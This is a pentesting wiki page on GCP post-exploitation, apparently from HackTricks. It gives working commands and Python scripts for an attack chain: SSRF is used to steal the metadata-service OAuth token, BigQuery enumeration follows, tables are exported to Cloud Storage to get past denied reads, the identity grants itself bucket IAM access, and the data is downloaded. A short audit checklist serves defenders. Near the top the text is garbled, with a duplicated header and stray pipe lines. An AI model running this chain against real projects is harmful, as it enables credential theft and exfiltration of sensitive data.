# GCP - Post Exploitation

{{#include ../../../banners/hacktricks-training.md}}

## Common Cross-Service Post-Exploitation Path

{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Common Cross-Service Post-Exploitation Path
|
||||
|
||||
A very common **GCP post-exploitation** situation is: you compromise a web application or workload running on a VM, abuse **SSRF** to reach the **metadata endpoint**, steal the **attached Service Account OAuth token**, and then pivot into the control plane with **legitimate API calls**.

This is especially useful when the compromised identity **cannot directly read the target data source**, but it **can still move data into a different service boundary** where the permissions are easier to abuse.

### 1. SSRF to metadata token theft

If an SSRF can reach the GCP metadata service, try to extract the token of the attached Service Account:

```bash
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
```

Then identify who the token belongs to and its scopes:

```bash
curl -H "Content-Type: application/x-www-form-urlencoded" \
  -d "access_token=<token>" \
  https://www.googleapis.com/oauth2/v1/tokeninfo
```
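From an SSRF foothold you rarely have `gcloud` available, so the two curl calls above can be scripted with stdlib Python. This is a minimal sketch: the endpoints are the ones shown above, but `fetch_metadata_token` and `parse_tokeninfo` are hypothetical helper names, and the fields extracted assume the documented tokeninfo response shape.

```python
import json
import urllib.parse
import urllib.request

METADATA_TOKEN_URL = (
    "http://metadata.google.internal/computeMetadata/v1/"
    "instance/service-accounts/default/token"
)
TOKENINFO_URL = "https://www.googleapis.com/oauth2/v1/tokeninfo"


def fetch_metadata_token() -> str:
    """Grab the attached SA's OAuth token; only works from the VM / via SSRF."""
    req = urllib.request.Request(
        METADATA_TOKEN_URL, headers={"Metadata-Flavor": "Google"}
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)["access_token"]


def parse_tokeninfo(info: dict) -> dict:
    """Reduce a tokeninfo response to the fields that matter for pivoting."""
    return {
        "identity": info.get("email", "<no email scope>"),
        "scopes": info.get("scope", "").split(),
        "seconds_left": int(info.get("expires_in", 0)),
    }


if __name__ == "__main__":
    token = fetch_metadata_token()
    data = urllib.parse.urlencode({"access_token": token}).encode()
    with urllib.request.urlopen(TOKENINFO_URL, data=data) as resp:
        print(parse_tokeninfo(json.load(resp)))
```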

Related pages:

{{#ref}}
../gcp-services/gcp-compute-instances-enum/
{{#endref}}
{{#ref}}
https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#gcp
{{#endref}}

### 2. Enumerate datasets and test direct access first

With the stolen token, enumerate the reachable BigQuery datasets/tables and try a direct read first:
```bash
export CLOUDSDK_AUTH_ACCESS_TOKEN="<token>"
bq ls
bq ls <proj>:<dataset>
bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table>` LIMIT 10'
```
If direct access fails with **`Access Denied`**, don't stop there. Check whether the identity still has the permissions to **export** data out of BigQuery and **write** to Cloud Storage.

### 3. Bypass denied table reads via BigQuery export to GCS

If the compromised identity has **`bigquery.tables.export`**, **`bigquery.jobs.create`**, and access to write into a bucket, it may still be able to extract the table by exporting it to Cloud Storage:
```bash
gcloud storage buckets create gs://<bucket-name> --location=<location>
bq extract <dataset>.<table> "gs://<bucket-name>/table-*.csv"
```
This is an important post-exploitation pattern: the attacker **doesn't need direct table read access** if they can force the data into a storage boundary they control.
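If `bq` isn't installed in the compromised environment, the same export can be driven with only the raw token via a BigQuery `jobs.insert` call carrying an `extract` configuration. A hedged sketch: the body shape follows the BigQuery v2 REST API, but the helper names are my own:

```python
import json
import urllib.request


def extract_job_body(project: str, dataset: str, table: str, gcs_uri: str) -> dict:
    """Build a BigQuery extract-job configuration (table -> GCS CSV)."""
    return {
        "configuration": {
            "extract": {
                "sourceTable": {
                    "projectId": project,
                    "datasetId": dataset,
                    "tableId": table,
                },
                "destinationUris": [gcs_uri],
                "destinationFormat": "CSV",
            }
        }
    }


def start_extract(token: str, project: str, body: dict) -> dict:
    """POST the job; requires bigquery.jobs.create + bigquery.tables.export."""
    url = f"https://bigquery.googleapis.com/bigquery/v2/projects/{project}/jobs"
    req = urllib.request.Request(
        url,
        data=json.dumps(body).encode(),
        headers={
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json",
        },
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)
```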

Related pages:

{{#ref}}
../gcp-services/gcp-bigquery-enum.md
{{#endref}}
{{#ref}}
../gcp-services/gcp-storage-enum.md
{{#endref}}

### 4. Self-grant access on the destination bucket

Sometimes the export succeeds but the compromised identity still cannot **list** or **read** the exported objects. If it also has **`storage.buckets.setIamPolicy`** over the destination bucket, it can often fix that by granting itself **`roles/storage.objectAdmin`** (or another read-capable role):
```bash
gcloud storage buckets add-iam-policy-binding gs://<bucket-name> \
  --member="serviceAccount:<sa-name>@<project-id>.iam.gserviceaccount.com" \
  --role="roles/storage.objectAdmin"
```
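The same self-grant works with only the raw token through the Cloud Storage JSON API: read the bucket policy, append a binding, write it back. A sketch assuming the documented `b/<bucket>/iam` endpoint; `add_binding` and `self_grant` are hypothetical helper names:

```python
import json
import urllib.request


def add_binding(policy: dict, role: str, member: str) -> dict:
    """Append member to role in a bucket IAM policy dict (idempotent)."""
    bindings = policy.setdefault("bindings", [])
    for b in bindings:
        if b["role"] == role:
            if member not in b["members"]:
                b["members"].append(member)
            return policy
    bindings.append({"role": role, "members": [member]})
    return policy


def self_grant(token: str, bucket: str, member: str,
               role: str = "roles/storage.objectAdmin") -> dict:
    """GET the bucket IAM policy, add the binding, PUT it back."""
    url = f"https://storage.googleapis.com/storage/v1/b/{bucket}/iam"
    hdrs = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
    with urllib.request.urlopen(urllib.request.Request(url, headers=hdrs)) as r:
        policy = json.load(r)
    req = urllib.request.Request(
        url,
        data=json.dumps(add_binding(policy, role, member)).encode(),
        headers=hdrs,
        method="PUT",
    )
    with urllib.request.urlopen(req) as r:
        return json.load(r)
```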

Then retrieve the data:

```bash
gcloud storage ls gs://<bucket-name>
gcloud storage cat gs://<bucket-name>/<object-name>
gcloud storage cp gs://<bucket-name>/<object-name> .
```

This turns a limited identity with **export-only** style access into a practical data-exfiltration path. When auditing GCP permissions, treat the following combination as high-risk:

- **Metadata reachability** from exploitable applications
- **`bigquery.tables.export`** + **`bigquery.jobs.create`**
- **`storage.buckets.create`** and/or **`storage.objects.create`**
- **`storage.buckets.setIamPolicy`** or equivalent bucket-IAM write access

### 5. Why this chain matters

This is not a new vulnerability class. The impact comes from **chaining** well-known primitives:
- SSRF gives access to the **metadata token**
- The token gives access to **cloud APIs**
- **BigQuery export** moves data out of the stricter boundary
- **Bucket IAM modification** restores read access on the exfiltration location

The result is that an identity that cannot directly query a sensitive dataset may still be able to **steal it through GCS**.

## References

- [Can AI Attack the Cloud? Lessons From Building an Autonomous Cloud Offensive Multi-Agent System](https://unit42.paloaltonetworks.com/autonomous-ai-cloud-attacks/)
- [Authenticate workloads to Google Cloud APIs using service accounts](https://cloud.google.com/compute/docs/access/authenticate-workloads)
- [Export table data to Cloud Storage](https://cloud.google.com/bigquery/docs/exporting-data)
- [IAM permissions for Cloud Storage](https://cloud.google.com/storage/docs/access-control/iam-permissions)
{{#include ../../../banners/hacktricks-training.md}}